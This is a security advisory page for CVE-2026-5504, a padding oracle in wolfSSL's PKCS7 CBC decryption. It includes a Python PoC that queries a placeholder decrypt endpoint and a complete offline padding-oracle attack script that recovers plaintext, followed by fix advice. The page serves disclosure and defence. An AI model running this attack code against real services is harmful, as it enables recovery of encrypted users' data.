Security Vulnerability Report
CVE-2026-5504 CVSS 5.3 MEDIUM

CVE-2026-5504

Published: 2026-04-09 23:17:01
Last Modified: 2026-04-29 14:06:59

Description

A padding oracle exists in wolfSSL's PKCS7 CBC decryption that could allow an attacker to recover plaintext through repeated decryption queries with modified ciphertext. In previous versions of wolfSSL the interior padding bytes are not validated: only the final byte (the pad length) is inspected, so malformed padding is accepted and the accept/reject behaviour can be probed with attacker-modified ciphertext. NVD records the weakness as CWE-354 (Improper Validation of Integrity Check Value); the fix is wolfSSL/wolfssl pull request 10088.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVSS 4.0 Score (secondary metric)
6.3 MEDIUM
CVSS 4.0 Vector
CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Configurations (Affected Products)

cpe:2.3:a:wolfssl:wolfssl:*:*:*:*:*:*:*:* - VULNERABLE
wolfSSL, versions up to and including 5.9.0 (all releases prior to the fix)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Conceptual PoC for a padding oracle attack against a service that decrypts
# PKCS#7-padded CBC data with wolfSSL (CVE-2026-5504). Recovers one plaintext byte.
import binascii

import requests

# Target endpoint that decrypts attacker-supplied ciphertext and reveals, through
# its response, whether the padding was accepted.
target_url = "https://example.com/api/decrypt"

# Intercepted ciphertext: IV followed by a single 16-byte block.
iv = bytes(range(16))
ciphertext_block = bytes.fromhex("aabbccddeeff00112233445566778899")


def padding_oracle(ciphertext):
    """Send the ciphertext to the server.

    Returns True if the server accepted the padding, False otherwise. The
    distinguishing signal (status code, error text, or timing) is specific to
    the target and has to be established by observation first.
    """
    try:
        response = requests.post(
            target_url,
            json={"data": binascii.hexlify(ciphertext).decode()},
            timeout=10,
        )
    except requests.RequestException as e:
        print(f"Error connecting to oracle: {e}")
        return False
    if response.status_code == 200:
        return True
    # An explicit padding error and a generic failure both count as "invalid".
    return False


print("[+] Starting padding oracle attack (last byte only)...")
# The last plaintext byte P is attacked by XORing the last IV byte with a guess g:
# the server then decrypts P ^ g. When it accepts the padding, P ^ g is almost
# always 0x01, so P = g ^ 0x01. g = 0 leaves the ciphertext untouched (its
# padding is already valid) and tells us nothing, so it is skipped.
for guess in range(1, 256):
    modified_iv = bytearray(iv)
    modified_iv[-1] ^= guess
    test_payload = bytes(modified_iv) + ciphertext_block
    if padding_oracle(test_payload):
        plaintext_byte = guess ^ 0x01
        print(f"[+] Valid padding with guess {hex(guess)}; "
              f"last plaintext byte is probably {hex(plaintext_byte)}")
        # A full attack rules out the 0x02 0x02 false positive, then works
        # backwards through the remaining bytes of the block.
        break
else:
    print("[-] No modified IV produced valid padding; check the oracle signal.")
print("[+] PoC execution completed.")
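The attack the PoC above only sketches, carried through end to end and offline, as an added example: this is neither wolfSSL code nor the page's PoC. A toy HMAC-based Feistel permutation stands in for AES so the script needs only the Python standard library; the attack itself never looks inside the block cipher. `unpad_lax` models the pre-fix behaviour the description gives (only the final pad byte is inspected) and `unpad_strict` the full PKCS#7 check; neither is wolfSSL's actual implementation. The `oracle` function is an assumed decrypt endpoint that reveals only whether unpadding succeeded, and the message is a constructed sample. `demo()` first shows that the lax check accepts padding a conforming check rejects, then recovers a three-block message from the strict oracle one byte at a time:

```python
import hashlib
import hmac
import secrets

BLOCK = 16

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Toy Feistel permutation (HMAC-SHA256 rounds) standing in for AES so this runs offline.
def _f(key, half, i):
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]

def enc_block(key, blk):
    left, right = blk[:8], blk[8:]
    for i in range(4):
        left, right = right, _xor(left, _f(key, right, i))
    return left + right

def dec_block(key, blk):
    left, right = blk[:8], blk[8:]
    for i in reversed(range(4)):
        left, right = _xor(right, _f(key, left, i)), left
    return left + right

def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad_lax(data):
    # Pre-fix behaviour per the advisory: only the final byte is checked, so 05 05 41 05 05 passes.
    n = data[-1]
    if not 1 <= n <= BLOCK:
        return None  # padding error
    return data[:-n]

def unpad_strict(data):
    # Full PKCS#7 check: each of the last n bytes must equal n.
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        return None  # padding error
    return data[:-n]

def cbc_encrypt(key, iv, pt):
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = enc_block(key, _xor(pt[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt_raw(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(dec_block(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

def recover_block(oracle, prev, block):
    # One plaintext block from a strict padding oracle, given the block (or IV) that preceded it.
    inter = bytearray(BLOCK)  # D_K(block); plaintext = inter XOR prev
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ pad  # known tail decrypts to the pad value
        for g in range(256):
            forged[pos] = g
            if not oracle(bytes(forged), block):
                continue
            if pos == BLOCK - 1:
                # Rule out a 02 02 false positive: disturbing the byte before
                # the last one leaves genuine 01 padding valid.
                forged[pos - 1] ^= 0xFF
                ok = oracle(bytes(forged), block)
                forged[pos - 1] ^= 0xFF
                if not ok:
                    continue
            inter[pos] = g ^ pad
            break
        else:
            raise RuntimeError("oracle never accepted a padding")
    return _xor(inter, prev)

def demo():
    key, iv = secrets.token_bytes(16), secrets.token_bytes(16)
    msg = b"wolfSSL PKCS7 CBC padding oracle demo"  # constructed sample
    ct = cbc_encrypt(key, iv, pkcs7_pad(msg))
    # 1. Malformed padding: the lax check strips it, the strict check rejects it.
    malformed = b"A" * 11 + bytes([5, 5, 0x41, 5, 5])
    lax_accepts = unpad_lax(malformed) == b"A" * 11
    strict_rejects = unpad_strict(malformed) is None
    # 2. A decrypt endpoint leaking one bit (padding valid or not) gives up the whole message.
    def oracle(iv_, ct_):
        return unpad_strict(cbc_decrypt_raw(key, iv_, ct_)) is not None
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    plain = b"".join(recover_block(oracle, blocks[i - 1], blocks[i]) for i in range(1, len(blocks)))
    return lax_accepts, strict_rejects, unpad_strict(plain) == msg
```

Two points follow for a fix. Validating every padding byte closes the CWE-354 acceptance of malformed padding, but `recover_block` works against any implementation whose success or failure is observable, so the check must also run in constant time and fail with the same error, and the same timing, as any other decryption failure. Against the modelled lax check the same query technique still leaks the last byte of each block, because acceptance depends on that byte alone: the set of accepted guesses is exactly {P xor 1, ..., P xor 16}, which pins down P.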

References

https://github.com/wolfSSL/wolfssl/pull/10088 - Issue Tracking, Patch

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5504", "sourceIdentifier": "[email protected]", "published": "2026-04-09T23:17:01.400", "lastModified": "2026-04-29T14:06:58.727", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A padding oracle exists in wolfSSL's PKCS7 CBC decryption that could allow an attacker to recover plaintext through repeated decryption queries with modified ciphertext. In previous versions of wolfSSL the interior padding bytes are not validated."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-354"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wolfssl:wolfssl:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.9.0", "matchCriteriaId": "DA5C710C-46E8-470C-83AF-D33D1A40512D"}]}]}], "references": [{"url": "https://github.com/wolfSSL/wolfssl/pull/10088", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}]}}